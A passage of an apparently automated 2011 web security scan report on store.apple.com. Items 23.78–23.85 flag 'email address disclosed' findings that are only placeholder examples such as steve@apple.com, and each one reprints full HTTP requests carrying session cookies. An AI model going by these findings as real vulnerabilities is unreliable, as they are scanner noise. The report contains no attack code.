s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=ipod%20-%20accessories%20(us);

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 03 Feb 2011 18:06:29 GMT
Cache-Control: private, max-age=600
Expires: Thu, 03 Feb 2011 18:18:11 GMT
ETag: "1eb75f7ca4340d3883935d1c019f0693"
Vary: accept-encoding
content-type: text/html; charset=UTF-8; encoding=UTF8
Date: Thu, 03 Feb 2011 18:08:11 GMT
x-request-id: 78327f8c-4ad7-4976-ba45-c4f6be63e981
Content-Length: 99529
x-frame-options: sameorigin


<!DOCTYPE html>
<html class="en-us en us" lang="en-US">
<head>
<meta name="viewport" content="width=1024" />


<title>Bose.. SoundDock.. 10 Digital Music System - Apple Store (U.
...[SNIP]...
<input name="mid" value="" type="email" maxlength="128" placeholder="example: steve@apple.com" />
...[SNIP]...

23.78. http://store.apple.com/us/product/TX381VC/A  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.apple.com
Path:   /us/product/TX381VC/A

Issue detail

The following email address was disclosed in the response:

Request

GET /us/product/TX381VC/A HTTP/1.1
Host: store.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D2%2C; geo=US; wosid=MqFbJfPVEePp2gNcNwF5ct0BU7b; s_sq=appleipod%2Cappleusitunesipod%3D%2526pid%253Dipod%252520-%252520accessories%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.apple.com%25252Fus%25252Fbrowse%25252Fhome%25252Fshop_ipod%25252Fipod_accessories%25252Fcar_audio_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=60%2C60%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; asbid=sUA9UFFFKPYUDFPTX; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; woinst=920064012; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=ipod%20-%20accessories%20(us);

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 03 Feb 2011 18:05:57 GMT
Cache-Control: private, max-age=600
Expires: Thu, 03 Feb 2011 18:18:21 GMT
content-type: text/html; charset=UTF-8; encoding=UTF8
ETag: "1d53d95b0a1aa0c9a9483f1a3b875214"
Vary: accept-encoding
Date: Thu, 03 Feb 2011 18:08:21 GMT
x-request-id: ad00ea3b-d92f-4ccb-a800-57f888f8a25f
Content-Length: 80240
x-frame-options: sameorigin


<!DOCTYPE html>
<html class="en-us en us" lang="en-US">
<head>
<meta name="viewport" content="width=1024" />


<title>Belkin 2.6' Retractable Cable for iPhone or iPod (3.5mm conn
...[SNIP]...
<input name="mid" value="" type="email" maxlength="128" placeholder="example: steve@apple.com" />
...[SNIP]...

23.79. http://store.apple.com/us/product/TX467VC/B  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.apple.com
Path:   /us/product/TX467VC/B

Issue detail

The following email address was disclosed in the response:

Request

GET /us/product/TX467VC/B?fnode=MTY1NDA2MQ&mco=MTMzODE4MTA HTTP/1.1
Host: store.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D2%2C; geo=US; wosid=MqFbJfPVEePp2gNcNwF5ct0BU7b; s_sq=appleipod%2Cappleusitunesipod%3D%2526pid%253Dipod%252520-%252520accessories%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.apple.com%25252Fus%25252Fbrowse%25252Fhome%25252Fshop_ipod%25252Fipod_accessories%25252Fcar_audio_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=60%2C60%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; asbid=sUA9UFFFKPYUDFPTX; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; woinst=920064012; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=ipod%20-%20accessories%20(us);

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 03 Feb 2011 17:57:15 GMT
Cache-Control: private, max-age=600
Expires: Thu, 03 Feb 2011 18:18:22 GMT
content-type: text/html; charset=UTF-8; encoding=UTF8
ETag: "0bcba006bdd733aaed6790f97666409d"
Vary: accept-encoding
Date: Thu, 03 Feb 2011 18:08:22 GMT
x-request-id: a9fcbdde-499b-43c0-b390-55a100cffa86
Content-Length: 93523
x-frame-options: sameorigin


<!DOCTYPE html>
<html class="en-us en us" lang="en-US">
<head>
<meta name="viewport" content="width=1024" />


<title>Griffin iTrip FM Transmitter - Apple Store (U.S.)</title>

<
...[SNIP]...
<input name="mid" value="" type="email" maxlength="128" placeholder="example: steve@apple.com" />
...[SNIP]...

23.80. http://store.apple.com/us/question/answers/product/H1938ZM/A  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.apple.com
Path:   /us/question/answers/product/H1938ZM/A

Issue detail

The following email address was disclosed in the response:

Request

GET /us/question/answers/product/H1938ZM/A?mco=MTk1NDA2ODY&pqid=QA9UDXPP2HUTTT2H7XYJ2JA4CCX994J92 HTTP/1.1
Host: store.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D2%2C; geo=US; wosid=MqFbJfPVEePp2gNcNwF5ct0BU7b; s_sq=appleipod%2Cappleusitunesipod%3D%2526pid%253Dipod%252520-%252520accessories%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.apple.com%25252Fus%25252Fbrowse%25252Fhome%25252Fshop_ipod%25252Fipod_accessories%25252Fcar_audio_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=60%2C60%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; asbid=sUA9UFFFKPYUDFPTX; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; woinst=920064012; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=ipod%20-%20accessories%20(us);

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 18:09:54 GMT
Content-Type: text/html; charset=UTF-8; encoding=UTF8
x-request-id: 80391d04-ae67-4ebb-9712-1ccc944f3ee6
Last-Modified: Thu, 03 Feb 2011 18:07:32 GMT
Cache-Control: private, max-age=600
Expires: Thu, 03 Feb 2011 18:19:54 GMT
ETag: "2a5981f0369c932c6904401201b89567"
Vary: accept-encoding
Content-Length: 31753
x-frame-options: sameorigin


<!DOCTYPE html>
<html class="en-us en us" lang="en-US">
<head>
<meta name="viewport" content="width=1024" />

<title>Does this adapter charge the iPod too? -I have a second generation iTouch and a
...[SNIP]...
<input name="mid" value="" type="email" maxlength="128" placeholder="example: steve@apple.com" />
...[SNIP]...

23.81. http://store.apple.com/us/questions/product/H1938ZM/A  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.apple.com
Path:   /us/questions/product/H1938ZM/A

Issue detail

The following email address was disclosed in the response:

Request

GET /us/questions/product/H1938ZM/A HTTP/1.1
Host: store.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D2%2C; geo=US; wosid=MqFbJfPVEePp2gNcNwF5ct0BU7b; s_sq=appleipod%2Cappleusitunesipod%3D%2526pid%253Dipod%252520-%252520accessories%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.apple.com%25252Fus%25252Fbrowse%25252Fhome%25252Fshop_ipod%25252Fipod_accessories%25252Fcar_audio_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=60%2C60%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; asbid=sUA9UFFFKPYUDFPTX; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; woinst=920064012; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=ipod%20-%20accessories%20(us);

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 18:09:42 GMT
Content-Type: text/html; charset=UTF-8; encoding=UTF8
x-request-id: f3ee1a81-639d-429c-88ad-70f7d831dae5
Last-Modified: Thu, 03 Feb 2011 18:07:28 GMT
Cache-Control: private, max-age=600
Expires: Thu, 03 Feb 2011 18:19:42 GMT
ETag: "99ee4e68306aa83cffa985eafcab577b"
Vary: accept-encoding
Content-Length: 33103
x-frame-options: sameorigin


<!DOCTYPE html>
<html class="en-us en us" lang="en-US">
<head>
<meta name="viewport" content="width=1024" />
   
<title>Questions about Griffin DirectDeck Universal Cassette Adapter - Apple Store (U
...[SNIP]...
<input name="mid" value="" type="email" maxlength="128" placeholder="example: steve@apple.com" />
...[SNIP]...

23.82. http://store.apple.com/us_smb_78313  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.apple.com
Path:   /us_smb_78313

Issue detail

The following email address was disclosed in the response:

Request

GET /us_smb_78313 HTTP/1.1
Host: store.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D2%2C; geo=US; wosid=MqFbJfPVEePp2gNcNwF5ct0BU7b; s_sq=appleipod%2Cappleusitunesipod%3D%2526pid%253Dipod%252520-%252520accessories%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.apple.com%25252Fus%25252Fbrowse%25252Fhome%25252Fshop_ipod%25252Fipod_accessories%25252Fcar_audio_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=60%2C60%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; asbid=sUA9UFFFKPYUDFPTX; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; woinst=920064012; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=ipod%20-%20accessories%20(us);

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 03 Feb 2011 18:10:23 GMT
Cache-Control: no-store, private, must-revalidate, proxy-revalidate, max-age=0, pre-check=0, post-check=0, no-cache
Expires: Wed, 02 Feb 2011 18:10:23 GMT
content-type: text/html; charset=UTF-8; encoding=UTF8
Vary: *
pragma: no-cache
Date: Thu, 03 Feb 2011 18:10:23 GMT
set-cookie: sfa=us_smb_78313; version="1"; expires=Sun, 31-Jan-2021 18:10:23 GMT; path=/
x-request-id: ad68d84a-2bfd-462a-95fd-47ddb9f0b0b2
Content-Length: 62462
x-frame-options: sameorigin

<!DOCTYPE html>
<html class="en-us en us" lang="en-US">
<head>
<meta name="viewport" content="width=1024" />
   
<title>Welcome to the Apple Store for Business - Apple Store for Business (U.S.)</title>

...[SNIP]...
dget.EmailSubscription');
var emailConfig= {

....    submitUrl: "https://mktws.apple.com/acdwsweb/ACDwsAction.do",
....    statusUrl: "https://mktws.apple.com/acdws/notify.js",
   emailPlaceholder: "example: steve@me.com",

.. .. urlArgs: {
.. .. .. .. /** Change locale to reflect your current locale. Do not edit any other values. **/
.. .. .. .. locale: 'en_us',
.. .. .. .. /** Don't edit these... **/
.. .. .. .. app
...[SNIP]...

23.83. https://store.apple.com/Apple/WebObjects/OrderStatus.woa  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://store.apple.com
Path:   /Apple/WebObjects/OrderStatus.woa

Issue detail

The following email address was disclosed in the response:

Request

GET /Apple/WebObjects/OrderStatus.woa HTTP/1.1
Host: store.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=appleglobal%2Capplehome; s_pathLength=homepage%3D1%2C; geo=US; s_sq=%5B%5BB%5D%5D; s_ppv=100%2C100%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; s_invisit_us=homepage%3Dtrue%3B; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=apple%20-%20index%20(US);

Response

HTTP/1.1 200 Apple
Date: Thu, 03 Feb 2011 17:49:28 GMT
Server: Apache/1.3.41-ps_webdav_01 (Darwin)
cache-control: private
cache-control: no-cache
cache-control: no-store
cache-control: must-revalidate
cache-control: max-age=0
expires: Sun, 30-Jan-2011 06:31:23 GMT
pragma: no-cache
connection: close
content-length: 13819
Content-Type: text/html; charset=UTF-8; encoding=UTF8
x-frame-options: sameorigin


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Apple Order Status</title>

<meta name="robots
...[SNIP]...
<span class="example">Example: steve@mac.com</span>
...[SNIP]...

23.84. https://store.apple.com/Apple/WebObjects/OrderStatus.woa/5134007/wo/ZB4oWsbh0bCLk6bYCPyBtM/0.2.1.0.0.0.29.1.5.15.7.13.25.1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://store.apple.com
Path:   /Apple/WebObjects/OrderStatus.woa/5134007/wo/ZB4oWsbh0bCLk6bYCPyBtM/0.2.1.0.0.0.29.1.5.15.7.13.25.1

Issue detail

The following email address was disclosed in the response:

Request

GET /Apple/WebObjects/OrderStatus.woa/5134007/wo/ZB4oWsbh0bCLk6bYCPyBtM/0.2.1.0.0.0.29.1.5.15.7.13.25.1 HTTP/1.1
Host: store.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D2%2C; geo=US; wosid=MqFbJfPVEePp2gNcNwF5ct0BU7b; s_sq=appleipod%2Cappleusitunesipod%3D%2526pid%253Dipod%252520-%252520accessories%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.apple.com%25252Fus%25252Fbrowse%25252Fhome%25252Fshop_ipod%25252Fipod_accessories%25252Fcar_audio_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=60%2C60%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; asbid=sUA9UFFFKPYUDFPTX; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; woinst=920064012; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=ipod%20-%20accessories%20(us);

Response

HTTP/1.1 200 Apple
Date: Thu, 03 Feb 2011 18:10:47 GMT
Server: Apache/1.3.41-ps_webdav_01 (Darwin)
cache-control: private
cache-control: no-cache
cache-control: no-store
cache-control: must-revalidate
cache-control: max-age=0
expires: Sun, 30-Jan-2011 06:15:40 GMT
pragma: no-cache
connection: close
content-length: 14032
Content-Type: text/html; charset=UTF-8; encoding=UTF8
x-frame-options: sameorigin


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Apple Order Status</title>

<meta name="robots
...[SNIP]...
<span class="example">Example: steve@mac.com</span>
...[SNIP]...

23.85. https://store.apple.com/rs/js/store/release/apple.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://store.apple.com
Path:   /rs/js/store/release/apple.js

Issue detail

The following email address was disclosed in the response:

Request

GET /rs/js/store/release/apple.js HTTP/1.1
Host: store.apple.com
Connection: keep-alive
Referer: https://store.apple.com/Apple/WebObjects/OrderStatus.woa?sf=us
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
